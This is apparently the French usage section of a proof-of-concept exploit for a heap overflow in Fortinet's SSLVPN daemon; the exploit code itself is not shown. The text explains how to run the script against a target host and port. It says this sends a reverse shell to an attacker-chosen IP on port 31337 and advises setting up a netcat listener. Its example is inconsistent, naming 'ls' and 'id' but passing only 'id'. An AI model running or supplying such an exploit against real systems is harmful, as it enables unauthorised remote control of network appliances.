
Code POC pour exploiter le débordement de tas dans le démon SSLVPN de Fortinet
pip install pwntools Pour utiliser ce code, vous pouvez l'enregistrer dans un fichier, par exemple exploit.py, puis l'exécuter avec Python en ligne de commande, en passant les arguments requis. Voici un exemple de commande pour exécuter l'exploit :
python exploit.py <target_host> <target_port> <reverse_ip>
Remplacez <target_host> par le nom d'hôte ou l'adresse IP du système cible, <target_port> par le numéro de port du service vulnérable, et <reverse_ip> par l'adresse IP de la machine sur laquelle vous souhaitez recevoir un shell. Les arguments restants sont les commandes que vous souhaitez exécuter, séparées par des espaces.
Par exemple, si le système cible a l'adresse IP 192.168.0.100, que le service vulnérable est exécuté sur le port 8080 et que vous souhaitez exécuter les commandes ls et id, vous exécuteriez la commande suivante :
python exploit.py 192.168.0.100 8080 192.168.0.101 id
Cela créera une connexion reverse shell vers 192.168.0.101:31337 et exécutera les commandes ls et id sur le système cible. Notez que vous devrez avoir un listener en cours d'exécution sur l'adresse IP et le port spécifiés pour recevoir le reverse shell. Vous pouvez utiliser des outils comme ncat ou netcat pour créer un listener.